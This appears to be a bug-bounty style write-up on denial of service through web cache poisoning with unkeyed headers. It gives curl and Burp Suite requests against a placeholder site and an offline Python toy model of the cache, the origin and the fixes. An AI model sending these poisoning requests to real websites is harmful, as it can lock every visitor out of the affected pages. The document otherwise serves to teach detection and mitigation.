Denial Of Service via Cache Poisoning - It’s ToxiC
Summary :
Denial Of Service :
Denial-of-Service (DoS) is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks usually accomplish this by flooding the target with traffic, or by sending it input that triggers a crash. In both cases the DoS attack deprives legitimate users of the service or resource they expected. In this write-up the service is denied without any flood at all: a single poisoned response is stored by the web cache and served to everyone.
Cache Poisoning :
Web cache poisoning is an advanced technique whereby an attacker exploits the behaviour of a web server and its cache so that a harmful HTTP response is served to other users.
The cache key is built only from the keyed parts of the request (typically the host, path and query string), not from headers such as X-Forwarded-Port. If the origin uses such an unkeyed header to build its response, the attacker's response is stored under the ordinary key, so anyone who subsequently requests that URL gets a cache hit and receives the poisoned redirect. When the redirect points at a port the browser refuses to connect to, Chrome shows "This site can't be reached" with the error ERR_UNSAFE_PORT.
This vulnerability can be exploited in many variations, e.g. using the X-Forwarded-Port, X-Forwarded-SSL or Transfer-Encoding headers.
1. X-Forwarded-Port :
The X-Forwarded-Port header can be used to persistently poison a redirect with an invalid port, so that every visitor who follows the cached redirect times out (or, for a port the browser refuses, gets ERR_UNSAFE_PORT).
2. X-Forwarded-SSL :
On some websites the X-Forwarded-SSL header can be used to overwrite certain cached pages with an error response saying 'Contradictory scheme headers'.
3. Transfer-Encoding :
An invalid Transfer-Encoding value can break core functionality: the server answers '501 Not Implemented', and if the cache stores that response it overwrites arbitrary pages with the error.
How to find this vulnerability ?
1. From a terminal, send one request that carries the unkeyed header together with a cache-buster parameter (toxic=888), so that only your own test entry is poisoned:
Command : curl -i -H 'X-Forwarded-Port: 123' 'https://www.website.com/?toxic=888'
2. Then load https://www.website.com/?toxic=888 in your browser. If the redirect you receive points at port 123 even though your browser sent no such header, the response built from the header was cached and is being served to everyone who requests that URL.
3. The X-Forwarded-Host header can be used the same way:
Command : curl -i -H 'X-Forwarded-Host: www.website.com:123' 'https://www.website.com/?toxic=888'
How to find this vulnerability using Transfer-Encoding header ?
1. Open the target website and intercept the request with Burp Suite.
2. Send the request to Repeater and add the header Transfer-Encoding: dgsht (any value that is not a transfer coding the server recognises).
3. Click Go and check the response. If the site is vulnerable the server answers 501 Not Implemented, and if the cache stores that response, the same URL requested without the header now returns the 501 too.
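As an added example (not code from the write-up, nor from curl or Burp), the following Python script models both procedures above so they can be reasoned about offline: a toy shared cache keyed on host, path and query string only, an origin that trusts X-Forwarded-Host / X-Forwarded-Port when building its redirect and answers 501 to an unknown Transfer-Encoding value, and a `probe()` that automates the two-request check (poison with the header, then fetch as a victim without it). The example URL, the origin and cache behaviour, and the partial Chromium port list are constructed for the demo. It also shows the two fixes: ignore the forwarded headers at the origin, or add them to the cache key, and do not store error responses.

```python
"""Toy model of the unkeyed-header cache poisoning described above.
Constructed for this example: the URL, the origin and cache behaviour and the
partial Chromium port list. This is not the original author's code."""
from urllib.parse import urlsplit

# Partial list of ports Chromium refuses to connect to (it shows
# "This site can't be reached" / ERR_UNSAFE_PORT). 123 (NTP) is on it.
CHROMIUM_UNSAFE_PORTS = {1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37,
                         42, 43, 53, 69, 77, 79, 87, 95, 101, 102, 103, 104,
                         109, 110, 111, 113, 115, 117, 119, 123, 135, 137, 139}


def make_request(url, headers=None):
    """Minimal request: path keeps the query string; Host comes from the URL."""
    u = urlsplit(url)
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    hdrs = {"Host": u.netloc}
    hdrs.update(headers or {})
    return {"path": path, "headers": hdrs}


def vulnerable_origin(req):
    """Origin that trusts X-Forwarded-Host / X-Forwarded-Port when building
    its redirect, and answers 501 to an unknown Transfer-Encoding value."""
    h = req["headers"]
    te = h.get("Transfer-Encoding")
    if te is not None and te.lower() != "chunked":
        return {"status": 501, "headers": {}}
    host = h.get("X-Forwarded-Host", h["Host"])
    port = h.get("X-Forwarded-Port")
    authority = f"{host}:{port}" if port else host
    return {"status": 301,
            "headers": {"Location": f"https://{authority}/home{req['path']}"}}


def hardened_origin(req):
    """Same redirect, built only from the real Host header; forwarded headers
    are ignored, so nothing attacker-controlled reaches the cached response."""
    return {"status": 301,
            "headers": {"Location": f"https://{req['headers']['Host']}/home{req['path']}"}}


class Cache:
    """Toy shared cache. Key = Host + path (with query) + the headers named in
    `vary`; every other header is unkeyed. `cacheable` decides what is stored
    (default: everything, which is what the write-up observed in the wild)."""

    def __init__(self, origin, vary=(), cacheable=lambda resp: True):
        self.origin, self.vary, self.cacheable = origin, tuple(vary), cacheable
        self.store = {}

    def handle(self, req):
        key = (req["headers"]["Host"], req["path"],
               tuple(req["headers"].get(h) for h in self.vary))
        if key in self.store:
            resp = dict(self.store[key])
            resp["x_cache"] = "HIT"
            return resp
        resp = self.origin(req)
        if self.cacheable(resp):
            self.store[key] = resp
        resp = dict(resp)
        resp["x_cache"] = "MISS"
        return resp


def probe(send, url, header, value):
    """The write-up's manual check, automated: send one cache-busted request
    carrying the header, then fetch the same URL as a victim (no header) and
    report what the victim received."""
    send(make_request(url, {header: value}))   # attacker's poisoning request
    victim = send(make_request(url))           # everyone else afterwards
    loc = victim["headers"].get("Location", "")
    return {"cache_hit": victim["x_cache"] == "HIT",
            "status": victim["status"],
            "location": loc,
            "reflected": value in loc,
            "browser_blocks": urlsplit(loc).port in CHROMIUM_UNSAFE_PORTS}


if __name__ == "__main__":
    url = "https://www.website.com/?toxic=888"   # constructed, as in the write-up
    for name, cache in [
        ("unkeyed header, everything cached", Cache(vulnerable_origin)),
        ("origin ignores forwarded headers", Cache(hardened_origin)),
        ("header added to the cache key", Cache(vulnerable_origin, vary=("X-Forwarded-Port",))),
    ]:
        print(name, probe(cache.handle, url, "X-Forwarded-Port", "123"))
    no_errors = Cache(vulnerable_origin, cacheable=lambda r: r["status"] < 500)
    print("501 not stored", probe(no_errors.handle, url, "Transfer-Encoding", "dgsht"))
```

Each probe uses a fresh cache, because a poisoned entry from one run would otherwise be returned by the next. Against a real target the same two requests are what the curl and Burp steps do by hand; the `reflected` and `cache_hit` fields are the signals to look for in the victim's response.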
Impact : An attacker can persistently replace the cached redirect (or any other cached page) on the target website with a broken response, so every user of the affected URL is locked out until the cache entry expires or is purged.
Thank You :)
Instagram : jerry._.3
Happy Hacking ;)